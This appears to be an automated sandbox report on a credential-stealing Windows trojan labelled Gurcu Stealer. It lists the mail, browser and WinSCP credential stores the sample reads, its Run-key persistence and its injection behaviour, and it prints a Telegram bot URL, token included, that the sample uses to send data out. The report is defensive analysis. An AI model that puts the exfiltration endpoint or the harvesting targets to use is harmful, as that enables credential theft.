                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123F53C GetUserNameW, 4_2_0123F53C

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Source: Yara matchFile source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Source: Yara match | File source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                11
                Registry Run Keys / Startup Folder
                112
                Process Injection
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                PowerShell
                Boot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder
                1
                Deobfuscate/Decode Files or Information
                111
                Input Capture
                1
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Masquerading
                1
                Credentials in Registry
                114
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration11
                Encrypted Channel
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)131
                Virtualization/Sandbox Evasion
                NTDS211
                Security Software Discovery
                Distributed Component Object Model111
                Input Capture
                Scheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script112
                Process Injection
                LSA Secrets2
                Process Discovery
                SSH1
                Clipboard Data
                Data Transfer Size Limits14
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Hidden Files and Directories
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                System Network Configuration Discovery
                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph (ID: 830902, Sample: file.exe, Start date: 20/03/2023, Architecture: WINDOWS, Score: 100)

Start
• Contacted domains: api4.ipify.org, api.telegram.org, api.ipify.org
• Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Yara detected Telegram RAT; 5 other signatures
• file.exe (started)
  • Dropped: C:\Users\user\AppData\...\Qasvjoldkyh.exe (PE32); C:\Users\...\Qasvjoldkyh.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\file.exe.log (ASCII)
  • Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Creates multiple autostart registry keys
  • file.exe (started)
    • Network: api4.ipify.org 104.237.62.211, 443, 49697, 49700, WEBNXUS, United States; api.telegram.org 149.154.167.220, 443, 49698, 49702, TELEGRAMRU, United Kingdom; 2 other IPs or domains
    • Dropped: C:\Users\user\AppData\Roaming\...\kDPmkTm.exe (PE32); C:\Users\user\...\kDPmkTm.exe:Zone.Identifier (ASCII)
    • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys
  • powershell.exe (started)
    • conhost.exe (started)
  • file.exe (started)
• Qasvjoldkyh.exe (started)
  • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Encrypted powershell cmdline option found
  • Qasvjoldkyh.exe (started)
    • Network: api.ipify.org
    • Signatures: Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
  • powershell.exe (started)
    • conhost.exe (started)
• kDPmkTm.exe (started)
  • Signatures: Injects a PE file into a foreign processes
  • powershell.exe (started)
    • conhost.exe (started)
  • kDPmkTm.exe (started)
• 2 other processes

Source | Detection | Scanner | Label
file.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
file.exe | 44% | Virustotal |
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | 44% | Virustotal |
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

Source | Detection | Scanner | Label
15.2.Qasvjoldkyh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035

No Antivirus matches

Source | Detection | Scanner | Label
https://api.telegram.org4 | 0% | URL Reputation | safe
https://api.telegram.org4 | 0% | URL Reputation | safe
https://api.ipify.org4 | 0% | URL Reputation | safe
https://urn.to/r/sds_see | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
http://www.microsoft.s | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api4.ipify.org | 104.237.62.211 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
api.ipify.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org4 | file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.microsoft.s | kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org4 | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.newtonsoft.com/jsonschema | kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/json | kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api4.ipify.org | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/ | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://urn.to/r/sds_see | file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.ipify.org | Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.237.62.211 | api4.ipify.org | United States | 18450 | WEBNXUS | false
                                              IP
                                              192.168.2.1
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830902
Start date and time: 2023-03-20 19:36:46 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@22/15@8/3
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 45
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information.
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:37:51 | API Interceptor | 102x Sleep call for process: powershell.exe modified
19:38:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
19:38:23 | API Interceptor | 752x Sleep call for process: file.exe modified
19:38:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
19:38:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
19:38:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
19:39:35 | API Interceptor | 18x Sleep call for process: Qasvjoldkyh.exe modified
19:39:48 | API Interceptor | 116x Sleep call for process: kDPmkTm.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              149.154.167.220file.exeGet hashmaliciousGurcu StealerBrowse
                                                PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                  izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                    widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                      Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                        https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                          g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                  PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                    PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                      PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                        FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                          doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                            EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                      104.237.62.211CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                          DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                    IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                                        main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                          EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        XOuNd4W6e6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          Inv-67383728 [Reference Nr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            Attachment.zipGet hashmaliciousAgentTesla, zgRATBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api4.ipify.org | T4oIN41uUE.exe | malicious | AgentTesla | 173.231.16.76
 | PSFBGrvmxy.exe | malicious | AgentTesla | 64.185.227.155
 | izwFjkhFJm.exe | malicious | AgentTesla | 173.231.16.76
 | Q4YODvoYjL.exe | malicious | AgentTesla | 173.231.16.76
 | Smh3IA9098.exe | malicious | AgentTesla | 64.185.227.155
 | CsTapHIkAO.exe | malicious | AgentTesla | 104.237.62.211
 | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
 | g0PWOnCNZH.exe | malicious | AgentTesla | 64.185.227.155
 | FeDex_shipping_document.exe | malicious | AgentTesla | 64.185.227.155
 | DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
 | New_Order_M2023SI3.xls | malicious | AgentTesla | 104.237.62.211
 | TT_copy.xls | malicious | AgentTesla | 173.231.16.76
 | PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 64.185.227.155
 | PO_340166.exe | malicious | AgentTesla | 64.185.227.155
 | 2303-64687.exe | malicious | AgentTesla | 173.231.16.76
 | Product_specifications.exe | malicious | AgentTesla | 104.237.62.211
 | REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 104.237.62.211
 | eRPRiQhQEI.exe | malicious | AgentTesla | 173.231.16.76
 | INV_SOA.exe | malicious | AgentTesla | 173.231.16.76
 | IMG_6071220733pdf.exe | malicious | AgentTesla | 104.237.62.211
api.telegram.org | file.exe | malicious | Gurcu Stealer | 149.154.167.220
 | PSFBGrvmxy.exe | malicious | AgentTesla | 149.154.167.220
 | izwFjkhFJm.exe | malicious | AgentTesla | 149.154.167.220
 | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220
 | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220
 | https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | 149.154.167.220
 | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220
 | file.exe | malicious | Unknown | 149.154.167.220
 | Remittance_slip.bat | malicious | Unknown | 149.154.167.220
 | New_Order_M2023SI3.xls | malicious | AgentTesla | 149.154.167.220
 | PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 149.154.167.220
 | PO_340166.exe | malicious | AgentTesla | 149.154.167.220
 | PO_IN34023.exe | malicious | AgentTesla, zgRAT | 149.154.167.220
 | FixDefError.exe | malicious | Xmrig | 149.154.167.220
 | doc10010679052382012143717.exe | malicious | AgentTesla | 149.154.167.220
 | EPe7VpI8DZ.exe | malicious | AgentTesla | 149.154.167.220
 | NJA7TOaADm.exe | malicious | AgentTesla, zgRAT | 149.154.167.220
 | 2wJjtj30x6.exe | malicious | AgentTesla | 149.154.167.220
 | iubK8Ka7o7.exe | malicious | AgentTesla | 149.154.167.220
 | Bank_Slip-_701536.doc | malicious | AgentTesla | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | file.exe | malicious | Vidar | 149.154.167.99
 | file.exe | malicious | Gurcu Stealer | 149.154.167.220
 | PSFBGrvmxy.exe | malicious | AgentTesla | 149.154.167.220
 | izwFjkhFJm.exe | malicious | AgentTesla | 149.154.167.220
 | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220
 | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220
 | https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | 149.154.167.220
 | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220
 | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | file.exe | malicious | Unknown | 149.154.167.220
 | Remittance_slip.bat | malicious | Unknown | 149.154.167.220
 | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
 | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
 | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
 | setup.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar | 149.154.167.99
WEBNXUS | T4oIN41uUE.exe | malicious | AgentTesla | 173.231.16.76
 | 02OVGHpJ8z.exe | malicious | Unknown | 64.185.227.155
 | PSFBGrvmxy.exe | malicious | AgentTesla | 173.231.16.76
 | izwFjkhFJm.exe | malicious | AgentTesla | 173.231.16.76
 | Q4YODvoYjL.exe | malicious | AgentTesla | 173.231.16.76
 | Smh3IA9098.exe | malicious | AgentTesla | 64.185.227.155
 | CsTapHIkAO.exe | malicious | AgentTesla | 173.231.16.76
 | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
 | g0PWOnCNZH.exe | malicious | AgentTesla | 64.185.227.155
 | FeDex_shipping_document.exe | malicious | AgentTesla | 64.185.227.155
 | DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
 | New_Order_M2023SI3.xls | malicious | AgentTesla | 104.237.62.211
 | TT_copy.xls | malicious | AgentTesla | 173.231.16.76
 | PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 64.185.227.155
 | PO_340166.exe | malicious | AgentTesla | 64.185.227.155
 | 2303-64687.exe | malicious | AgentTesla | 173.231.16.76
 | Product_specifications.exe | malicious | AgentTesla | 173.231.16.76
 | REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
 | eRPRiQhQEI.exe | malicious | AgentTesla | 173.231.16.76
 | INV_SOA.exe | malicious | AgentTesla | 173.231.16.76
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Gurcu Stealer | 149.154.167.220, 104.237.62.211
 | T4oIN41uUE.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | PSFBGrvmxy.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | izwFjkhFJm.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | Q4YODvoYjL.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | CsTapHIkAO.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 104.237.62.211
 | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
 | Payment Invoice file.htm | malicious | HTMLPhisher | 149.154.167.220, 104.237.62.211
 | file.exe | malicious | Unknown | 149.154.167.220, 104.237.62.211
 | Budget plan 2023.zip | malicious | Unknown | 149.154.167.220, 104.237.62.211
 | setup.exe | malicious | Xmrig | 149.154.167.220, 104.237.62.211
 | Remittance_slip.bat | malicious | Unknown | 149.154.167.220, 104.237.62.211
 | Payment Invoice 0012657.html | malicious | HTMLPhisher | 149.154.167.220, 104.237.62.211
 | FeDex_shipping_document.exe | malicious | AgentTesla | 149.154.167.220, 104.237.62.211
                                                                                                                              DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              No context
Process:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1459
Entropy (8bit):5.3420905847574325
Encrypted:false
SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
MD5:FB4B7720101F874710FF986326F7980F
SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
